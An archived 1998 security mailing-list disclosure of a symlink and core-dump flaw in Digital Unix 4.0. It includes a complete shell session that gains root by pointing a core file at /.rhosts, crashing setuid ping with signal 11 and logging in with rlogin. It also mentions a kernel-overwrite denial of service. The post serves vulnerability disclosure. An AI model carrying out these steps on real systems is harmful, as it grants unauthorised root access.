Symlink problem in Digital Unix 4.0, discovered by |-ru5ty- and [SoReN] (28/03/1998) Starting 2 suid root programs in background, and killing them with -11 flag, we'll have a core root owned with our gid and mode 600. Then is enough a symlink to create a file everywhere...like /.rhosts. rustyat_private sorenat_private $ ls -l /.rhosts /.rhosts not found $ ls -l /usr/sbin/ping -rwsr-xr-x 1 root bin 32768 Nov 16 1996 /usr/sbin/ping $ ln -s /.rhosts core $ IMP=' >+ + >' $ ping somehost & [1] 1337 $ ping somehost & [2] 31337 $ kill -11 31337 $ kill -11 1337 [1] Segmentation fault /usr/sbin/ping somehost (core dumped) [2] +Segmentation fault /usr/sbin/ping somehost (core dumped) $ ls -l /.rhosts -rw------- 1 root system 385024 Mar 29 05:17 /.rhosts ##/.rhosts has been created....that's all.## $ rlogin localhost -l root Is a very serious problem, it needs a fix as soon as possible, infact we can have a DoS if we link our core to the kernel. Other platforms: SunOs 4.1.x 5.5.x Doesn't work Linux 2.0.x Doesn't work Digital Unix 4.0d Doesn't work Others (note tested yet)
This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 13:48:02 PDT